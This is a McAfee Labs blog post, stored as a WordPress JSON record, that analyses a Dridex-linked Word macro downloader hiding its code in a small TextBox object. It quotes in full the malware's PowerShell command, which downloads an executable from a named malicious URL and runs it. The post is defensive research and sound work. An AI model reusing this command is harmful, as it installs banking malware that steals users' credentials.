{"id":48006,"date":"2016-03-08T12:57:50","date_gmt":"2016-03-08T20:57:50","guid":{"rendered":"https:\/\/blogs.mcafee.com\/?p=48006"},"modified":"2025-06-02T19:15:56","modified_gmt":"2025-06-03T02:15:56","slug":"macro-malware-associated-dridex-finds-new-ways-hide","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","title":{"rendered":"Macro Malware Associated With Dridex Finds New Ways to Hide"},"content":{"rendered":"<p>Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered a W97M\/Downloader variant that\u00a0uses a new technique to obfuscate its malicious intentions.<\/p>\n<p>Almost one year ago, we discovered Microsoft Office XML documents containing compressed MSO\u00a0ActiveMime objects. These objects extract an encrypted\u00a0OLE object that\u00a0is executed along with the malicious code contained within multiple macros. (See <a href=\"https:\/\/securingtomorrow.mcafee.com\/mcafee-labs\/banking-malware-dridex-arrives-via-phishing-email\/\" target=\"_blank\" rel=\"noopener\">&#8216;Banking&#8217; Malware Dridex Arrives via Phishing Email<\/a>.) Today, this technique has evolved and two new protection layers have been added to this infection chain:<\/p>\n<ul>\n<li>The malicious XML document is now hidden in a multipart MIME object distributed as .RTF or .DOC files that\u00a0arrive via phishing or spam emails. When a user opens the attachment in one of these emails, the malicious code in the embedded OLE document runs.<\/li>\n<li><span style=\"line-height: 1.5;\">The code responsible for\u00a0downloading and executing the final payload is no longer in the macro. 
It is now in a TextBox1 object embedded in a form object, shown in the following image:<\/span><\/li>\n<\/ul>\n<figure id=\"attachment_48018\" aria-describedby=\"caption-attachment-48018\" style=\"width: 736px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-48018\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\" alt=\"TextBox1\" width=\"736\" height=\"418\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1.png 1078w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1-300x170.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1-768x436.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1-1024x581.png 1024w\" sizes=\"auto, (max-width: 736px) 100vw, 736px\" \/><figcaption id=\"caption-attachment-48018\" class=\"wp-caption-text\"><em>Malicious code present in a TextBox object property.<\/em><\/figcaption><\/figure>\n<p>As the preceding screenshot shows, the malicious\u00a0code is hidden within\u00a0the Value and Text attributes of\u00a0the TextBox1 object and so is not visible in the macros. In the image we have resized the TextBox1 object to show the code. 
The actual TextBox1 object in the malware is very small, which at first effectively hides it.<\/p>\n<p>We found other macros in the document, but their only function is to execute the code in the TextBox1 object, as the following screenshots show:<\/p>\n<figure id=\"attachment_48019\" aria-describedby=\"caption-attachment-48019\" style=\"width: 739px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-48019 size-full\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/ThisDocument-1.png\" alt=\"ThisDocument\" width=\"739\" height=\"368\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/ThisDocument-1.png 739w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/ThisDocument-1-300x149.png 300w\" sizes=\"auto, (max-width: 739px) 100vw, 739px\" \/><figcaption id=\"caption-attachment-48019\" class=\"wp-caption-text\"><em>ThisDocument code calling the dsfsdff module.<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_48020\" aria-describedby=\"caption-attachment-48020\" style=\"width: 751px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-48020 size-full\" src=\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/module1-1.png\" alt=\"Module1\" width=\"751\" height=\"352\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/module1-1.png 751w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/module1-1-300x141.png 300w\" sizes=\"auto, (max-width: 751px) 100vw, 751px\" \/><figcaption id=\"caption-attachment-48020\" class=\"wp-caption-text\"><em>The dsfsdff module running the TextBox object in a form object (rddchgvjj).<\/em><\/figcaption><\/figure>\n<p>By calling the TextBox1 object, shown above, the malware executes the following PowerShell command to download and execute the malicious payload:<\/p>\n<p style=\"padding-left: 30px;\">cmd \/K PowerShell.exe (New-Object 
System.Net.WebClient).DownloadFile(&#8216;http:\/\/raspberry.diversified-capital-management.com\/zalupa\/kurva.php&#8217;,&#8217;%TEMP%\\sdjgbcjkds.exe&#8217;);Start-Process &#8216;%TEMP%\\sdjgbcjkds.exe&#8217;;<\/p>\n<p>The malicious payload is associated with Dridex, \u201cbanking\u201d malware that can steal user credentials for online banking accounts. Dridex was derived from Cridex and both are part of the GameOver Zeus malware family.<\/p>\n<p>Full descriptions of the W97M, X97M, and Dridex malware families are available in\u00a0our Threat Advisory:<\/p>\n<ul>\n<li>W97M\/Downloader and X97M\/Downloader Threat Advisory<\/li>\n<\/ul>\n<p>We recommend that users never open emails sent by unknown parties, especially if they come with unknown attachments. We also recommend that users not\u00a0enable macro functionality within Microsoft Office. Malicious emails commonly contain instructions\u00a0asking users to enable macros and giving specific instructions for how to enable them, but users should never\u00a0follow\u00a0these instructions.<\/p>\n<h2>During our analysis, the malware contacted the following control servers (with URLs modified for safety):<\/h2>\n<h2>MD5 hashes for\u00a0the samples we 
found:<\/h2>\n<p>McAfee advises all users to keep their antimalware signatures up to date at all times. McAfee products detect this Office malformed Trojan as W97M\/Downloader![Partial hash] and Dridex as Trojan-Dridex with DAT Versions 8097 and later.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection&#8230;.<\/p>\n","protected":false},"author":771,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1814,76,338,180],"coauthors":[3077],"class_list":["post-48006","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-computer-security","tag-cybercrime","tag-endpoint-protection","tag-malware"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. 
McAfee Labs recently discovered\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/jorgeariasv\" \/>\n<meta property=\"article:published_time\" content=\"2016-03-08T20:57:50+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-03T02:15:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1078\" \/>\n\t<meta property=\"og:image:height\" content=\"612\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jorge Arias\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@n_John_g_\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jorge Arias\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"},\"author\":{\"name\":\"Jorge Arias\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5\"},\"headline\":\"Macro Malware Associated With Dridex Finds New Ways to Hide\",\"datePublished\":\"2016-03-08T20:57:50+00:00\",\"dateModified\":\"2025-06-03T02:15:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"},\"wordCount\":652,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"keywords\":[\"computer security\",\"cybercrime\",\"endpoint protection\",\"malware\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\",\"name\":\"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee 
Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"datePublished\":\"2016-03-08T20:57:50+00:00\",\"dateModified\":\"2025-06-03T02:15:56+00:00\",\"description\":\"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage\",\"url\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\",\"contentUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee 
Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Macro Malware Associated With Dridex Finds New Ways to Hide\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5\",\"name\":\"Jorge 
Arias\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/c55fbf619cb4d744f9ed6dd76bbad8e3\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g\",\"caption\":\"Jorge Arias\"},\"description\":\"Jorge works at McAfee as Anti-Malware Security Researcher. He is a malware research specialist adding detection and repair for malicious threats to protect our customers. Arias has more than 6 years of experience analyzing malware and was technical lead on his previous role as Field Engineer before joining Threat Intelligence &amp; Escalations Team. - Twitter: @Sairraj\",\"sameAs\":[\"https:\/\/www.facebook.com\/jorgeariasv\",\"https:\/\/www.linkedin.com\/in\/jorgeariasvelasquez\/?locale=en_US\",\"https:\/\/x.com\/n_John_g_\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/jorge-arias\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. McAfee Labs recently discovered","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","og_description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. 
McAfee Labs recently discovered","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/jorgeariasv","article_published_time":"2016-03-08T20:57:50+00:00","article_modified_time":"2025-06-03T02:15:56+00:00","og_image":[{"width":1078,"height":612,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/textbox1-1.png","type":"image\/png"}],"author":"Jorge Arias","twitter_card":"summary_large_image","twitter_creator":"@n_John_g_","twitter_site":"@McAfee","twitter_misc":{"Written by":"Jorge Arias","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"},"author":{"name":"Jorge Arias","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5"},"headline":"Macro Malware Associated With Dridex Finds New Ways to Hide","datePublished":"2016-03-08T20:57:50+00:00","dateModified":"2025-06-03T02:15:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"},"wordCount":652,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","keywords":["computer security","cybercrime","endpoint protection","malware"],"articleSection":["McAfee 
Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/","name":"Macro Malware Associated With Dridex Finds New Ways to Hide | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","datePublished":"2016-03-08T20:57:50+00:00","dateModified":"2025-06-03T02:15:56+00:00","description":"Macro malware is on the upswing and cybercriminals are always searching for new ways to deceive users and evade detection. 
McAfee Labs recently discovered","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#primaryimage","url":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png","contentUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/textbox1-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/macro-malware-associated-dridex-finds-new-ways-hide\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Macro Malware Associated With Dridex Finds New Ways to Hide"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security 
News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/00fb6bcebfad67078d8b77a9069abbb5","name":"Jorge Arias","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/c55fbf619cb4d744f9ed6dd76bbad8e3","url":"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f254462555885d5fb96bdc77199d0440?s=96&d=mm&r=g","caption":"Jorge Arias"},"description":"Jorge works at McAfee as Anti-Malware Security Researcher. He is a malware research specialist adding detection and repair for malicious threats to protect our customers. Arias has more than 6 years of experience analyzing malware and was technical lead on his previous role as Field Engineer before joining Threat Intelligence &amp; Escalations Team. 
- Twitter: @Sairraj","sameAs":["https:\/\/www.facebook.com\/jorgeariasv","https:\/\/www.linkedin.com\/in\/jorgeariasvelasquez\/?locale=en_US","https:\/\/x.com\/n_John_g_"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/jorge-arias\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/771"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=48006"}],"version-history":[{"count":2,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006\/revisions"}],"predecessor-version":[{"id":214926,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/48006\/revisions\/214926"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=48006"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=48006"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=48006"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=48006"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}